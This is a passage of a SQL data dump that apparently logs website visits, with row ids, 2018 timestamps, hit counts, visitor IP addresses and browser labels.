0,'66.249.75.157','chrome'),(277492,1532262549,1,1,0,0,'54.36.148.199','other'),(277493,1532262934,3,3,0,0,'216.244.66.241','other'),(277494,1532263182,1,1,0,0,'54.36.148.123','other'),(277495,1532263406,1,1,0,0,'178.154.171.88','other'),(277496,1532263680,2,2,0,0,'141.8.142.74','other'),(277497,1532263730,1,1,0,0,'54.36.149.22','other'),(277498,1532264008,1,1,0,0,'40.77.167.204','other'),(277499,1532264022,1,1,0,0,'54.36.148.253','other'),(277500,1532264178,1,1,0,0,'54.36.148.88','other'),(277501,1532264683,1,1,0,0,'54.36.148.97','other'),(277502,1532264710,1,1,0,0,'54.36.148.210','other'),(277503,1532264829,1,1,0,0,'54.36.148.47','other'),(277504,1532264899,1,1,0,0,'141.8.142.74','other'),(277505,1532264975,1,1,0,0,'54.36.148.166','other'),(277506,1532265199,1,1,0,0,'54.36.149.21','other'),(277507,1532265378,1,1,0,0,'54.36.148.118','other'),(277508,1532265421,1,1,0,0,'54.36.148.174','other'),(277509,1532265493,1,1,0,0,'54.36.149.81','other'),(277510,1532265683,1,1,0,0,'216.244.66.241','other'),(277511,1532265768,1,1,0,0,'8.29.198.26','other'),(277512,1532265936,1,1,0,0,'54.36.148.33','other'),(277513,1532266314,1,1,0,0,'54.36.149.74','other'),(277514,1532266567,1,1,0,0,'54.36.148.119','other'),(277515,1532266733,1,1,0,0,'91.196.178.102','firefox'),(277516,1532266740,1,1,0,0,'54.36.148.245','other'),(277517,1532266949,1,1,0,0,'54.36.148.87','other'),(277518,1532266965,1,0,1,0,'66.249.69.145',''),(277519,1532266980,1,1,0,0,'54.36.148.108','other'),(277520,1532266993,1,1,0,0,'54.36.149.8','other'),(277521,1532267229,1,1,0,0,'54.36.149.44','other'),(277522,1532267250,1,1,0,0,'54.36.148.239','other'),(277523,1532267259,1,1,0,0,'54.36.149.85','other'),(277524,1532267294,1,1,0,0,'180.76.15.146','other'),(277525,1532267399,1,1,0,0,'54.36.148.170','other'),(277526,1532267646,2,2,0,0,'178.154.171.88','other'),(277527,1532268232,2,0,2,0,'66.249.75.157',''),(277528,1532268426,1,1,0,0,'54.36.148.137','other'),(277529,1532268626,1,1,0,0,'95.84.198.118','msie'),(277530,1532268721,1,1,0,0,'95.163.255.96','other'),(277531,1532268822,1,1,0,0,'216.244.66.241','other'),(277532,1532268844,1,1,0,0,'54.36.149.9','other'),(277533,1532268854,1,1,0,0,'54.36.148.89','other'),(277534,1532268905,1,1,0,0,'54.36.148.221','other'),(277535,1532269076,1,1,0,0,'54.36.148.234','other'),(277536,1532269357,1,1,0,0,'8.29.198.26','other'),(277537,1532269396,1,1,0,0,'54.36.148.40','other'),(277538,1532269614,1,1,0,0,'54.36.148.170','other'),(277539,1532269687,1,1,0,0,'54.36.149.76','other'),(277540,1532270104,3,3,0,0,'216.244.66.241','other'),(277541,1532270205,1,1,0,0,'95.132.25.45','firefox'),(277542,1532270404,1,1,0,0,'54.36.148.154','other'),(277543,1532270568,1,1,0,0,'144.76.166.14','other'),(277544,1532271218,1,1,0,0,'54.36.148.145','other'),(277545,1532271393,1,1,0,0,'180.76.15.161','other'),(277546,1532271581,1,1,0,0,'141.8.142.74','other'),(277547,1532271629,1,1,0,0,'54.36.148.125','other'),(277548,1532272018,1,1,0,0,'95.163.255.92','other'),(277549,1532272147,1,1,0,0,'54.36.149.7','other'),(277550,1532272252,2,2,0,0,'66.249.93.204','chrome'),(277551,1532272306,1,1,0,0,'54.36.148.34','other'),(277552,1532272346,1,1,0,0,'54.36.148.58','other'),(277553,1532272508,1,1,0,0,'54.36.148.54','other'),(277554,1532272542,1,1,0,0,'54.36.149.61','other'),(277555,1532272626,1,1,0,0,'66.249.93.205','chrome'),(277556,1532272697,2,2,0,0,'216.244.66.241','other'),(277557,1532273445,1,1,0,0,'54.36.148.200','other'),(277558,1532273932,1,1,0,0,'54.36.148.198','other'),(277559,1532274031,1,1,0,0,'54.36.148.39','other'),(277560,1532274135,1,1,0,0,'54.36.148.169','other'),(277561,1532274307,1,1,0,0,'54.36.148.143','other'),(277562,1532274308,1,1,0,0,'54.36.149.70','other'),(277563,1532274389,1,1,0,0,'54.36.148.203','other'),(277564,1532274444,1,1,0,0,'54.36.148.132','other'),(277565,1532275512,1,1,0,0,'54.36.148.189','other'),(277566,1532275574,1,1,0,0,'54.36.148.198','other'),(277567,1532275582,1,1,0,0,'69.12.66.252','chrome'),(277568,1532275627,1,1,0,0,'69.12.66.247','chrome'),(277569,1532275660,1,1,0,0,'54.36.148.181','other'),(277570,1532275752,1,1,0,0,'54.36.148.100','other'),(277571,1532275781,1,1,0,0,'54.36.148.55','other'),(277572,1532275788,1,1,0,0,'69.12.66.200','chrome'),(277573,1532275969,1,1,0,0,'54.36.148.246','other'),(277574,1532276047,1,1,0,0,'54.36.148.85','other'),(277575,1532276399,1,1,0,0,'216.244.66.241','other'),(277576,1532276610,1,1,0,0,'8.29.198.25','other'),(277577,1532276767,1,1,0,0,'54.36.148.130','other'),(277578,1532276797,1,1,0,0,'54.36.148.15','other'),(277579,1532276960,1,0,1,0,'66.249.75.157',''),(277580,1532277233,1,1,0,0,'54.36.149.71','other'),(277581,1532277495,1,1,0,0,'216.244.66.241','other'),(277582,1532278231,1,1,0,0,'54.36.148.209','other'),(277583,1532278433,1,1,0,0,'180.76.15.153','other'),(277584,1532278577,1,1,0,0,'54.36.148.53','other'),(277585,1532278608,1,1,0,0,'54.36.148.75','other'),(277586,1532278753,1,1,0,0,'54.36.148.200','other'),(277587,1532278789,1,1,0,0,'216.244.66.241','other'),(277588,1532278812,1,1,0,0,'54.36.148.97','other'),(277589,1532278855,1,0,1,0,'66.249.69.144',''),(277590,1532279193,1,0,1,0,'66.249.75.155',''),(277591,1532279668,1,1,0,0,'54.36.148.204','other'),(277592,1532280192,1,1,0,0,'8.29.198.27','other'),(277593,1532280298,1,1,0,0,'54.36.148.220','other'),(277594,1532280418,1,1,0,0,'54.36.149.107','other'),(277595,1532280506,1,1,0,0,'66.249.69.144','chrome'),(277596,1532280631,1,1,0,0,'54.36.148.212','other'),(277597,1532281112,1,1,0,0,'54.36.149.30','other'),(277598,1532281193,1,1,0,0,'216.244.66.241','other'),(277599,1532281319,1,1,0,0,'54.36.148.67','other'),(277600,1532281449,4,4,0,0,'91.196.178.102','firefox'),(277601,1532281599,1,1,0,0,'91.201.247.168','firefox'),(277602,1532281644,1,1,0,0,'54.36.149.87','other'),(277603,1532281677,1,1,0,0,'54.36.148.159','other'),(277604,1532282144,1,1,0,0,'54.36.148.164','other'),(277605,1532282588,23,23,0,0,'54.224.60.122','other'),(277606,1532283001,1,1,0,0,'54.36.148.192','other'),(277607,1532283012,1,1,0,0,'216.244.66.241','other'),(277608,1532283291,1,1,0,0,'54.36.148.123','other'),(277609,1532283385,1,0,1,0,'66.249.69.144',''),(277610,1532283517,40,40,0,0,'54.224.60.122','other'),(277611,1532283998,1,1,0,0,'207.46.13.25','other'),(277612,1532284419,37,37,0,0,'54.224.60.122','other'),(277613,1532284439,1,1,0,0,'54.36.148.81','other'),(277614,1532284838,1,1,0,0,'107.167.116.19','other'),(277615,1532286261,1,1,0,0,'95.163.255.95','other'),(277616,1532286282,1,1,0,0,'95.163.255.96','other'),(277617,1532286338,1,1,0,0,'54.36.149.37','other'),(277618,1532286355,1,1,0,0,'54.36.148.168','other'),(277619,1532286441,1,1,0,0,'54.36.149.59','other'),(277620,1532286501,1,1,0,0,'54.36.148.32','other'),(277621,1532286536,2,2,0,0,'216.244.66.241','other'),(277622,1532287061,1,0,1,0,'66.249.69.144',''),(277623,1532287456,1,1,0,0,'8.29.198.27','other'),(277624,1532287518,1,1,0,0,'54.36.148.235','other'),(277625,1532287841,1,1,0,0,'54.36.148.150','other'),(277626,1532288301,1,1,0,0,'54.36.148.65','other'),(277627,1532288542,1,1,0,0,'141.8.142.74','other'),(277628,1532288591,1,1,0,0,'54.36.148.201','other'),(277629,1532288653,1,1,0,0,'54.36.148.195','other'),(277630,1532288791,1,1,0,0,'54.36.148.129','other'),(277631,1532289459,1,1,0,0,'54.36.148.20','other'),(277632,1532289644,1,1,0,0,'54.36.149.6','other'),(277633,1532289913,1,1,0,0,'54.36.149.61','other'),(277634,1532290008,1,1,0,0,'54.36.149.82','other'),(277635,1532290032,1,1,0,0,'180.76.15.154','other'),(277636,1532290086,1,1,0,0,'46.211.155.123','other'),(277637,1532290194,1,1,0,0,'54.36.149.30','other'),(277638,1532290578,1,1,0,0,'54.36.148.188','other'),(277639,1532290716,1,1,0,0,'54.36.148.171','other'),(277640,1532291343,1,1,0,0,'216.244.66.241','other'),(277641,1532291449,1,1,0,0,'8.29.198.27','other'),(277642,1532291535,1,1,0,0,'178.154.171.88','other'),(277643,1532291696,1,0,1,0,'66.249.75.153',''),(277644,1532291727,1,1,0,0,'207.46.13.25','other'),(277645,1532291842,1,1,0,0,'54.36.148.250','other'),(277646,1532292125,1,1,0,0,'54.36.149.100','other'),(277647,1532292245,1,1,0,0,'54.36.148.33','other'),(277648,1532292246,1,1,0,0,'185.11.29.167','firefox'),(277649,1532292681,1,1,0,0,'54.36.148.103','other'),(277650,1532292948,1,1,0,0,'54.36.148.14','other'),(277651,1532293442,1,1,0,0,'54.36.149.80','other'),(277652,1532293577,1,1,0,0,'54.36.148.213','other'),(277653,1532293639,2,2,0,0,'178.154.171.88','other'),(277654,1532293870,1,1,0,0,'54.36.149.95','other'),(277655,1532293932,1,1,0,0,'54.36.148.230','other'),(277656,1532293985,1,1,0,0,'54.36.149.49','other'),(277657,1532294011,1,1,0,0,'54.36.149.75','other'),(277658,1532294038,1,1,0,0,'54.36.148.53','other'),(277659,1532294276,2,2,0,0,'54.36.148.83','other'),(277660,1532294353,1,0,1,0,'66.249.69.144',''),(277661,1532294669,1,1,0,0,'54.36.149.104','other'),(277662,1532294803,1,1,0,0,'54.36.148.133','other'),(277663,1532295099,1,1,0,0,'54.36.149.66','other'),(277664,1532295210,1,1,0,0,'54.36.148.144','other'),(277665,1532295217,1,1,0,0,'54.36.148.158','other'),(277666,1532295479,1,1,0,0,'54.36.148.195','other'),(277667,1532296201,1,0,1,0,'66.249.69.143',''),(277668,1532296216,1,1,0,0,'54.36.148.213','other'),(277669,1532296266,1,1,0,0,'54.36.148.214','other'),(277670,1532296653,1,1,0,0,'54.36.149.40','other'),(277671,1532296788,1,1,0,0,'207.46.13.25','other'),(277672,1532297420,1,1,0,0,'54.36.148.143','other'),(277673,1532297658,1,1,0,0,'54.36.148.46','other'),(277674,1532297692,1,1,0,0,'91.209.11.236','other'),(277675,1532298086,1,1,0,0,'178.128.64.208','other'),(277676,1532298226,1,1,0,0,'54.36.148.159','other'),(277677,1532298294,1,1,0,0,'54.36.149.84','other'),(277678,1532298296,1,1,0,0,'8.29.198.26','other'),(277679,1532298381,1,0,1,0,'66.249.69.144',''),(277680,1532298640,1,1,0,0,'54.36.148.229','other'),(277681,1532298712,1,1,0,0,'54.36.149.3','other'),(277682,1532298727,1,1,0,0,'54.36.149.76','other'),(277683,1532298904,1,1,0,0,'80.248.227.208','other'),(277684,1532299022,1,1,0,0,'51.255.65.46','other'),(277685,1532299171,1,1,0,0,'54.36.148.199','other'),(277686,1532299649,1,1,0,0,'54.36.148.207','other'),(277687,1532299774,1,1,0,0,'54.36.148.39','other'),(277688,1532300049,1,1,0,0,'54.36.148.90','other'),(277689,1532300057,1,1,0,0,'54.36.148.247','other'),(277690,1532300098,1,1,0,0,'216.244.66.241','other'),(277691,1532300421,1,0,1,0,'66.249.75.155',''),(277692,1532300714,1,1,0,0,'54.36.149.61','other'),(277693,1532300960,1,1,0,0,'54.36.148.18','other'),(277694,1532301080,7,7,0,0,'40.77.167.204','other'),(277695,1532301131,1,1,0,0,'207.46.13.25','other'),(277696,1532301428,1,1,0,0,'54.36.148.156','other'),(277697,1532301842,1,1,0,0,'54.36.148.231','other'),(277698,1532301862,1,1,0,0,'54.36.149.57','other'),(277699,1532301978,1,1,0,0,'54.36.148.127','other'),(277700,1532302233,1,1,0,0,'54.36.148.214','other'),(277701,1532302275,1,1,0,0,'180.76.15.29','other'),(277702,1532302341,1,1,0,0,'141.8.142.74','other'),(277703,1532302366,1,1,0,0,'8.29.198.26','other'),(277704,1532302417,1,1,0,0,'54.36.148.14','other'),(277705,1532302571,1,1,0,0,'54.36.148.45','other'),(277706,1532302593,1,1,0,0,'54.36.148.224','other'),(277707,1532302882,1,1,0,0,'54.36.148.165','other'),(277708,1532303189,1,1,0,0,'54.36.148.161','other'),(277709,1532303518,1,1,0,0,'54.36.148.185','other'),(277710,1532303571,1,1,0,0,'54.36.148.25','other'),(277711,1532303579,1,1,0,0,'54.36.149.68','other'),(277712,1532303617,1,1,0,0,'54.36.148.162','other'),(277713,1532303631,1,0,1,0,'66.249.75.155',''),(277714,1532303720,1,1,0,0,'54.36.149.10','other'),(277715,1532303988,1,1,0,0,'54.36.149.57','other'),(277716,1532304671,1,1,0,0,'54.36.148.64','other'),(277717,1532304741,1,0,1,0,'66.249.69.143',''),(277718,1532304786,1,1,0,0,'95.163.255.99','other'),(277719,1532305095,1,1,0,0,'216.244.66.241','other'),(277720,1532305340,1,1,0,0,'66.249.69.144','chrome'),(277721,1532305456,1,1,0,0,'54.36.148.151','other'),(277722,1532305555,1,1,0,0,'54.36.148.124','other'),(277723,1532305570,1,1,0,0,'54.36.149.41','other'),(277724,1532306177,1,1,0,0,'141.8.142.74','other'),(277725,1532306614,1,1,0,0,'91.209.11.236','other'),(277726,1532306684,1,1,0,0,'54.36.149.46','other'),(277727,1532307826,1,1,0,0,'216.244.66.241','other'),(277728,1532308191,1,1,0,0,'54.36.149.54','other'),(277729,1532308323,1,1,0,0,'54.36.148.70','other'),(277730,1532308531,1,1,0,0,'54.36.148.216','other'),(277731,1532309133,1,1,0,0,'8.29.198.27','other'),(277732,1532309181,1,1,0,0,'54.36.149.42','other'),(277733,1532309859,1,1,0,0,'54.36.148.208','other'),(277734,1532309871,1,1,0,0,'54.36.148.55','other'),(277735,1532309926,1,1,0,0,'54.36.149.80','other'),(277736,1532309984,1,1,0,0,'54.36.149.82','other'),(277737,1532310262,1,1,0,0,'54.36.148.236','other'),(277738,1532310310,1,1,0,0,'91.209.11.236','other'),(277739,1532310327,1,1,0,0,'95.163.255.92','other'),(277740,1532310331,1,1,0,0,'95.163.255.96','other'),(277741,1532310451,1,1,0,0,'54.36.148.32','other'),(277742,1532310683,1,1,0,0,'54.36.148.112','other'),(277743,1532310797,1,1,0,0,'54.36.149.50','other'),(277744,1532310902,1,0,1,0,'66.249.75.157',''),(277745,1532310950,1,1,0,0,'54.36.149.24','other'),(277746,1532311478,1,1,0,0,'54.36.148.126','other'),(277747,1532311495,1,1,0,0,'54.36.148.227','other'),(277748,1532311553,1,1,0,0,'54.36.149.93','other'),(277749,1532311619,1,1,0,0,'95.163.255.99','other'),(277750,1532311731,1,1,0,0,'54.36.149.19','other'),(277751,1532311865,1,1,0,0,'54.36.149.89','other'),(277752,1532312011,1,1,0,0,'54.36.148.130','other'),(277753,1532312082,1,1,0,0,'54.36.148.93','other'),(277754,1532312191,1,1,0,0,'51.15.146.39','chrome'),(277755,1532312318,1,1,0,0,'54.36.149.106','other'),(277756,1532312324,1,1,0,0,'35.162.70.167','chrome'),(277757,1532312344,1,1,0,0,'54.36.148.182','other'),(277758,1532312433,1,1,0,0,'54.36.149.76','other'),(277759,1532313052,1,1,0,0,'54.36.149.15','other'),(277760,1532313209,1,1,0,0,'8.29.198.27','other'),(277761,1532313214,1,1,0,0,'54.36.148.72','other'),(277762,1532313243,1,1,0,0,'141.8.142.74','other'),(277763,1532313820,1,1,0,0,'54.36.148.25','other'),(277764,1532313997,1,1,0,0,'91.209.11.236','other'),(277765,1532314065,1,1,0,0,'54.36.148.22','other'),(277766,1532314163,1,0,1,0,'66.249.69.145',''),(277767,1532314254,1,1,0,0,'54.36.148.224','other'),(277768,1532314305,1,1,0,0,'54.36.149.37','other'),(277769,1532314431,1,1,0,0,'178.154.171.88','other'),(277770,1532314609,1,1,0,0,'141.8.142.74','other'),(277771,1532314767,1,1,0,0,'54.36.148.16','other'),(277772,1532315159,1,1,0,0,'54.36.148.200','other'),(277773,1532315472,2,2,0,0,'92.113.189.235','chrome'),(277774,1532315652,1,1,0,0,'54.36.149.81','other'),(277775,1532315764,1,1,0,0,'54.36.149.104','other'),(277776,1532315809,1,1,0,0,'54.36.148.164','other'),(277777,1532315890,1,1,0,0,'54.36.148.249','other'),(277778,1532315932,1,1,0,0,'54.36.148.153','other'),(277779,1532316068,1,1,0,0,'144.76.38.40','other'),(277780,1532316667,1,1,0,0,'54.36.148.233','other'),(277781,1532316780,1,1,0,0,'54.36.148.78','other'),(277782,1532317110,1,1,0,0,'54.36.148.159','other'),(277783,1532317251,1,1,0,0,'95.163.255.96','other'),(277784,1532317334,1,1,0,0,'91.209.11.236','other'),(277785,1532317347,1,1,0,0,'54.36.148.70','other'),(277786,1532317541,1,1,0,0,'54.165.59.7','other'),(277787,1532317569,1,1,0,0,'54.36.149.41','other'),(277788,1532317587,1,1,0,0,'87.250.224.46','other'),(277789,1532317989,1,1,0,0,'216.244.66.241','other'),(277790,1532318292,1,1,0,0,'54.36.148.128','other'),(277791,1532318557,1,1,0,0,'54.36.148.94','other'),(277792,1532318749,1,1,0,0,'54.36.148.214','other'),(277793,1532318830,1,1,0,0,'54.36.149.44','other'),(277794,1532318984,1,1,0,0,'91.209.11.236','other'),(277795,1532319067,2,2,0,0,'37.73.221.42','chrome'),(277796,1532319164,9,9,0,0,'178.63.34.189','other'),(277797,1532319265,1,1,0,0,'54.36.149.49','other'),(277798,1532319646,1,1,0,0,'54.36.149.96','other'),(277799,1532319832,1,1,0,0,'54.36.149.91','other'),(277800,1532319976,1,1,0,0,'8.29.198.25','other'),(277801,1532320170,1,1,0,0,'54.36.149.1','other'),(277802,1532320346,1,1,0,0,'54.36.148.189','other'),(277803,1532320408,1,0,1,0,'66.249.75.155',''),(277804,1532320575,1,1,0,0,'54.36.149.8','other'),(277805,1532320617,1,1,0,0,'54.36.148.163','other'),(277806,1532320686,1,1,0,0,'54.36.148.168','other'),(277807,1532320781,1,1,0,0,'91.209.11.236','other'),(277808,1532320920,2,2,0,0,'216.244.66.241','other'),(277809,1532321035,1,1,0,0,'95.163.255.182','other'),(277810,1532321150,1,1,0,0,'54.36.148.50','other'),(277811,1532321271,1,1,0,0,'54.36.149.14','other'),(277812,1532321371,1,1,0,0,'54.165.59.7','other'),(277813,1532321613,1,1,0,0,'54.36.149.44','other'),(277814,1532321780,2,2,0,0,'66.102.9.35','chrome'),(277815,1532321784,1,1,0,0,'66.102.9.40','chrome'),(277816,1532321923,1,1,0,0,'54.36.149.60','other'),(277817,1532322422,1,1,0,0,'54.36.149.83','other'),(277818,1532322502,1,1,0,0,'95.133.43.254','firefox'),(277819,1532322672,1,1,0,0,'91.209.11.236','other'),(277820,1532322801,2,2,0,0,'216.244.66.241','other'),(277821,1532323213,1,0,1,0,'66.249.75.155',''),(277822,1532323644,1,1,0,0,'54.36.148.236','other'),(277823,1532323671,1,1,0,0,'54.36.148.97','other'),(277824,1532323672,1,1,0,0,'54.36.148.21','other'),(277825,1532324060,1,1,0,0,'8.29.198.26','other'),(277826,1532324207,1,1,0,0,'37.55.93.20','chrome'),(277827,1532324356,1,1,0,0,'54.36.148.168','other'),(277828,1532324486,2,2,0,0,'91.196.178.169','chrome'),(277829,1532325129,1,1,0,0,'54.36.148.204','other'),(277830,1532325297,1,1,0,0,'54.36.149.106','other'),(277831,1532325543,1,1,0,0,'54.36.149.36','other'),(277832,1532325837,1,1,0,0,'54.36.148.206','other'),(277833,1532325841,1,1,0,0,'54.36.148.121','other'),(277834,1532326021,2,2,0,0,'66.102.9.35','chrome'),(277835,1532326084,2,2,0,0,'216.244.66.241','other'),(277836,1532326173,1,1,0,0,'95.163.255.97','other'),(277837,1532326190,1,1,0,0,'91.196.178.84','firefox'),(277838,1532326649,1,1,0,0,'217.69.143.44','other'),(277839,1532326724,1,1,0,0,'162.210.196.97','other'),(277840,1532326924,1,0,1,0,'66.249.69.143',''),(277841,1532326931,1,1,0,0,'54.36.149.2','other'),(277842,1532326991,1,1,0,0,'54.36.148.239','other'),(277843,1532327033,1,1,0,0,'54.36.148.148','other'),(277844,1532327399,1,1,0,0,'54.36.148.85','other'),(277845,1532327636,1,1,0,0,'54.36.148.56','other'),(277846,1532327792,1,1,0,0,'95.163.255.99','other'),(277847,1532327879,1,1,0,0,'54.165.59.7','other'),(277848,1532328163,1,1,0,0,'207.46.13.25','other'),(277849,1532328189,1,0,1,0,'66.249.69.145',''),(277850,1532328201,1,1,0,0,'93.183.224.86','chrome'),(277851,1532328236,1,1,0,0,'91.209.11.236','other'),(277852,1532328447,2,2,0,0,'141.8.142.74','other'),(277853,1532328564,1,1,0,0,'54.36.148.16','other'),(277854,1532328876,2,2,0,0,'216.244.66.241','other'),(277855,1532328932,1,1,0,0,'54.36.148.101','other'),(277856,1532329006,1,1,0,0,'87.250.224.46','other'),(277857,1532329065,1,1,0,0,'194.187.218.146','chrome'),(277858,1532329362,1,1,0,0,'54.36.149.81','other'),(277859,1532329610,1,1,0,0,'176.100.174.30','chrome'),(277860,1532329704,1,1,0,0,'54.36.148.62','other'),(277861,1532330498,1,1,0,0,'54.36.149.43','other'),(277862,1532330593,1,1,0,0,'54.36.149.40','other'),(277863,1532330631,1,1,0,0,'54.36.149.36','other'),(277864,1532330777,1,1,0,0,'91.196.178.87','chrome'),(277865,1532330816,1,1,0,0,'8.29.198.27','other'),(277866,1532330869,1,1,0,0,'178.251.107.35','chrome'),(277867,1532331081,1,1,0,0,'91.209.11.236','other'),(277868,1532331323,1,1,0,0,'54.36.148.41','other'),(277869,1532331371,1,1,0,0,'54.36.148.245','other'),(277870,1532331674,1,1,0,0,'54.36.148.28','other'),(277871,1532331768,1,1,0,0,'207.46.13.25','other'),(277872,1532331776,3,3,0,0,'91.196.178.78','chrome'),(277873,1532331826,1,1,0,0,'192.241.187.83','firefox'),(277874,1532332033,1,0,1,0,'66.249.69.144',''),(277875,1532332462,1,1,0,0,'178.95.66.69','chrome'),(277876,1532332754,2,2,0,0,'141.8.142.74','other'),(277877,1532332905,1,1,0,0,'54.36.149.58','other'),(277878,1532332957,1,1,0,0,'95.132.51.226','chrome'),(277879,1532333797,1,1,0,0,'54.36.148.203','other'),(277880,1532333907,1,1,0,0,'54.36.148.243','other'),(277881,1532334096,1,1,0,0,'54.36.148.114','other'),(277882,1532334252,1,1,0,0,'54.36.148.134','other'),(277883,1532334364,2,2,0,0,'91.209.11.236','other'),(277884,1532334412,1,1,0,0,'54.208.102.37','other'),(277885,1532334543,1,1,0,0,'54.36.149.56','other'),(277886,1532334832,1,1,0,0,'54.36.148.26','other'),(277887,1532334897,1,1,0,0,'8.29.198.26','other'),(277888,1532335043,1,1,0,0,'95.132.58.182','firefox'),(277889,1532335289,1,1,0,0,'54.36.148.31','other'),(277890,1532335534,1,1,0,0,'141.8.142.74','other'),(277891,1532335544,1,1,0,0,'54.36.148.112','other'),(277892,1532335948,2,0,2,0,'66.249.69.143',''),(277893,1532335989,1,1,0,0,'54.36.149.85','other'),(277894,1532336377,2,2,0,0,'178.93.119.177','chrome'),(277895,1532336539,1,1,0,0,'54.36.148.25','other'),(277896,1532336577,3,3,0,0,'216.244.66.241','other'),(277897,1532336712,1,1,0,0,'54.36.148.175','other'),(277898,1532336797,1,1,0,0,'54.36.148.79','other'),(277899,1532336932,1,1,0,0,'54.36.149.96','other'),(277900,1532336970,1,1,0,0,'54.36.148.160','other'),(277901,1532337494,1,1,0,0,'54.36.148.234','other'),(277902,1532337570,1,1,0,0,'54.36.149.12','other'),(277903,1532337594,1,1,0,0,'54.36.148.16','other'),(277904,1532337740,1,1,0,0,'54.36.148.21','other'),(277905,1532337814,1,1,0,0,'54.36.149.61','other'),(277906,1532337909,1,1,0,0,'54.36.148.252','other'),(277907,1532338062,1,1,0,0,'141.8.142.74','other'),(277908,1532338064,1,1,0,0,'54.36.149.81','other'),(277909,1532338225,1,1,0,0,'54.36.149.71','other'),(277910,1532338360,2,2,0,0,'91.196.178.179','chrome'),(277911,1532338385,1,1,0,0,'54.36.149.106','other'),(277912,1532338658,1,1,0,0,'54.36.148.60','other'),(277913,1532338757,2,2,0,0,'216.244.66.241','other'),(277914,1532339035,1,1,0,0,'54.36.148.194','other'),(277915,1532339108,1,1,0,0,'95.163.255.94','other'),(277916,1532339131,1,1,0,0,'54.36.148.27','other'),(277917,1532339134,1,1,0,0,'54.36.148.196','other'),(277918,1532339580,1,1,0,0,'54.36.148.147','other'),(277919,1532339674,1,1,0,0,'91.209.11.236','other'),(277920,1532339693,1,1,0,0,'54.36.148.165','other'),(277921,1532339702,1,1,0,0,'91.196.178.69','firefox'),(277922,1532339911,1,1,0,0,'54.36.149.60','other'),(277923,1532340053,1,1,0,0,'54.36.148.72','other'),(277924,1532340184,1,1,0,0,'95.163.255.97','other'),(277925,1532340673,1,1,0,0,'54.36.148.196','other'),(277926,1532340751,1,1,0,0,'54.36.148.154','other'),(277927,1532341269,1,1,0,0,'54.36.149.8','other'),(277928,1532341542,1,1,0,0,'54.36.148.246','other'),(277929,1532341580,1,1,0,0,'54.36.148.76','other'),(277930,1532341655,1,1,0,0,'8.29.198.27','other'),(277931,1532341739,1,1,0,0,'91.196.178.129','firefox'),(277932,1532341796,1,1,0,0,'54.36.148.66','other'),(277933,1532341862,1,1,0,0,'54.36.149.9','other'),(277934,1532341890,1,1,0,0,'54.36.148.37','other'),(277935,1532341893,2,2,0,0,'216.244.66.241','other'),(277936,1532341922,1,1,0,0,'54.36.149.32','other'),(277937,1532342265,1,1,0,0,'95.163.255.99','other'),(277938,1532342552,1,1,0,0,'54.36.148.167','other'),(277939,1532342912,1,1,0,0,'54.36.148.97','other'),(277940,1532343003,1,1,0,0,'54.36.148.10','other'),(277941,1532343240,4,4,0,0,'194.187.170.125','other'),(277942,1532343251,1,1,0,0,'46.201.146.209','chrome'),(277943,1532343253,1,1,0,0,'91.209.11.236','other'),(277944,1532343890,1,1,0,0,'94.178.207.235','chrome'),(277945,1532343911,1,1,0,0,'54.36.148.51','other'),(277946,1532343994,1,1,0,0,'54.36.149.23','other'),(277947,1532344081,1,1,0,0,'178.92.16.239','chrome'),(277948,1532344168,2,2,0,0,'194.187.170.125','other'),(277949,1532344319,1,1,0,0,'54.36.149.54','other'),(277950,1532344355,1,1,0,0,'46.201.125.163','chrome'),(277951,1532344450,1,1,0,0,'91.209.11.236','other'),(277952,1532344722,1,1,0,0,'54.36.149.103','other'),(277953,1532344837,1,1,0,0,'176.108.106.9','chrome'),(277954,1532345113,4,4,0,0,'194.187.170.125','other'),(277955,1532345727,1,1,0,0,'8.29.198.27','other'),(277956,1532345972,1,1,0,0,'207.46.13.25','other'),(277957,1532346017,2,2,0,0,'194.187.170.125','other'),(277958,1532346900,2,2,0,0,'91.209.11.236','other'),(277959,1532347136,4,4,0,0,'194.187.170.125','other'),(277960,1532347157,2,2,0,0,'216.244.66.241','other'),(277961,1532347756,1,1,0,0,'54.36.149.66','other'),(277962,1532348008,1,1,0,0,'109.86.69.227','firefox'),(277963,1532348172,5,5,0,0,'194.187.170.125','other'),(277964,1532348348,1,1,0,0,'54.36.149.27','other'),(277965,1532348369,1,1,0,0,'77.111.244.37','chrome'),(277966,1532348684,1,1,0,0,'54.36.148.80','other'),(277967,1532348890,3,3,0,0,'5.9.98.234','other'),(277968,1532349102,1,1,0,0,'91.209.11.236','other'),(277969,1532349629,2,2,0,0,'194.187.170.125','other'),(277970,1532349756,2,0,2,0,'66.249.75.201',''),(277971,1532349799,2,2,0,0,'216.244.66.241','other'),(277972,1532349929,1,1,0,0,'54.36.149.3','other'),(277973,1532349944,1,1,0,0,'54.36.149.103','other'),(277974,1532349950,1,1,0,0,'54.36.148.53','other'),(277975,1532350054,1,1,0,0,'77.111.244.33','chrome'),(277976,1532350171,1,1,0,0,'54.165.59.7','other'),(277977,1532350430,1,1,0,0,'91.124.182.170','firefox'),(277978,1532350769,6,6,0,0,'194.187.170.125','other'),(277979,1532351236,1,1,0,0,'54.36.149.94','other'),(277980,1532351364,2,0,2,0,'66.249.69.157',''),(277981,1532351520,1,0,1,0,'66.249.75.201',''),(277982,1532351668,1,0,1,0,'66.249.75.195',''),(277983,1532351866,1,1,0,0,'216.244.66.241','other'),(277984,1532351896,5,5,0,0,'194.187.170.125','other'),(277985,1532351978,1,1,0,0,'95.163.255.94','other'),(277986,1532351994,1,1,0,0,'40.77.167.203','other'),(277987,1532352076,1,1,0,0,'54.36.149.35','other'),(277988,1532352175,2,2,0,0,'91.196.178.169','chrome'),(277989,1532352444,1,1,0,0,'54.36.148.162','other'),(277990,1532352488,1,1,0,0,'8.29.198.25','other'),(277991,1532352594,1,1,0,0,'54.36.148.157','other'),(277992,1532352709,1,1,0,0,'54.36.148.243','other'),(277993,1532352724,1,1,0,0,'54.36.148.140','other'),(277994,1532352745,1,1,0,0,'91.124.182.170','firefox'),(277995,1532352793,1,1,0,0,'54.36.148.90','other'),(277996,1532353215,1,1,0,0,'207.46.13.25','other'),(277997,1532353217,1,1,0,0,'194.187.170.125','other'),(277998,1532353362,1,1,0,0,'54.36.148.18','other'),(277999,1532353464,1,1,0,0,'91.209.11.236','other'),(278000,1532353731,1,1,0,0,'52.53.201.78','chrome'),(278001,1532353943,1,1,0,0,'54.36.148.123','other'),(278002,1532354055,1,1,0,0,'54.36.148.48','other'),(278003,1532354079,1,1,0,0,'54.36.148.21','other'),(278004,1532354506,1,1,0,0,'54.36.149.63','other'),(278005,1532354581,1,1,0,0,'54.36.148.172','other'),(278006,1